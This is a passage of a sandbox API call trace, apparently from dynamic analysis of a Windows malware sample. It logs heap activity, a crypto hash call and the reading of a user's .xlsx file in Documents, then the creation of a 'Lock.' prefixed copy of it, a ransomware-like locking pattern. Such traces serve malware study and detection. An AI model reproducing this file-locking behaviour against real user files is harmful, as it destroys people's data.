RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d60 [0263.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0263.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0263.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0263.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51da8 | out: hHeap=0x970000) returned 1 [0263.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d60 [0263.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d78 [0263.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d90 [0263.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0263.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d90 | out: hHeap=0x970000) returned 1 [0263.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0263.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0263.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d78 [0263.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d90 [0263.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51da8 [0263.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0263.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51da8 | out: hHeap=0x970000) returned 1 [0263.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0263.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d90 | out: hHeap=0x970000) returned 1 [0263.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d90 [0263.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51da8 [0263.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51f10 [0263.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0263.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51f10 | out: hHeap=0x970000) returned 1 [0263.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0263.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51da8 | out: hHeap=0x970000) returned 1 [0263.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51da8 [0263.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ec8 [0263.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52090 [0263.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0263.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52090 | out: hHeap=0x970000) returned 1 [0263.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0263.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ec8 | out: hHeap=0x970000) returned 1 [0263.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52120 [0263.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e520c0 [0263.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e520a8 [0263.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0263.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e520a8 | out: hHeap=0x970000) returned 1 [0263.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0263.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e520c0 | out: hHeap=0x970000) returned 1 [0263.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0263.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0263.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0263.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0263.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0263.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54210 | out: hHeap=0x970000) returned 1 [0263.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e98 | out: hHeap=0x970000) returned 1 [0263.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0263.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d18 | out: hHeap=0x970000) returned 1 [0263.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e08 | out: hHeap=0x970000) returned 1 [0263.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0263.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0263.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c10 | out: hHeap=0x970000) returned 1 [0263.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0263.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0263.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0263.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e80 | out: hHeap=0x970000) returned 1 [0263.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0263.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dd8 | out: hHeap=0x970000) returned 1 [0263.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0263.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0263.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0263.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0263.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0263.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0263.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e68 | out: hHeap=0x970000) returned 1 [0263.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d30 | out: hHeap=0x970000) returned 1 [0263.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d48 | out: hHeap=0x970000) returned 1 [0263.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78c00 | out: hHeap=0x970000) returned 1 [0263.931] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0263.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0263.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0263.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0263.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b28 [0263.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0263.931] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0263.931] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0263.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0263.932] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0263.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0263.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0263.932] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0263.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0263.932] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0263.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0263.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0263.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b28 [0263.932] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0263.932] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0263.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0263.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0263.933] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0263.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0263.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0263.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0263.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0263.933] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0263.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x11) returned 0x2e69b28 [0263.933] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2e69b28, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0263.933] CryptDestroyHash (hHash=0xa87390) returned 1 [0263.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f15178 [0263.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0263.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0263.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e20 [0263.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e68 [0263.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e80 [0263.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0263.933] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0263.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0263.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dc0 [0263.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dd8 [0263.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0263.934] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0263.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0263.934] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0263.934] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0263.934] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0263.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0263.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0263.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517c0 [0263.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0263.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518b0 [0263.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0263.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51640 [0263.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0263.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0263.935] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0263.935] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x2f04008 [0263.935] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0263.935] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0263.935] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents/ith_1X2kFN3hB-U9.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\ith_1x2kfn3hb-u9.xlsx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0263.936] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0263.936] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0263.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b28 [0263.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0263.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0263.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0263.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0263.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0263.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0263.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0263.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0263.936] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0263.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0263.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0263.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0263.936] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0263.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0263.936] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0263.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0263.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515f8 [0263.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0263.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0263.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517c0 [0263.937] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0263.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518b0 [0263.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0263.937] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0263.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0263.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0263.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e565e8 [0263.937] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0263.937] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents/" (normalized: "c:\\users\\fd1hvy\\documents")) returned 0x11 [0263.937] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e565e8 | out: hHeap=0x970000) returned 1 [0263.937] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0263.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0263.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x3be08a8 [0263.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0263.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0263.938] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents/Lock.ith_1X2kFN3hB-U9.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\lock.ith_1x2kfn3hb-u9.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0263.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69928 [0263.938] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0263.939] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0263.939] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0263.939] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0263.939] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0263.939] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0263.939] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0263.939] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0263.939] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0263.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0263.939] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0263.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b08 [0263.939] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0263.939] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b08 | out: hHeap=0x970000) returned 1 [0263.939] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0263.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0263.939] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0263.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0263.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51748 [0263.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517c0 [0263.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0263.939] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0263.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515f8 [0263.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0263.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0263.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699a8 [0263.940] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0263.940] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0263.940] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0263.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518b0 [0263.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51868 [0263.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0263.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0x1257020 [0263.944] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0263.944] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0263.948] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x2e2a, lpOverlapped=0x0) returned 1 [0263.948] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0263.949] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0263.949] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0263.949] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0263.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0263.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x12e2a) returned 0x2f16018 [0263.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x1257020 | out: hHeap=0x970000) returned 1 [0263.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0263.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0263.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0263.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0263.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0263.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0263.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0263.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0263.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x12e2a) returned 0x2f28e50 [0263.966] HeapFree (in: 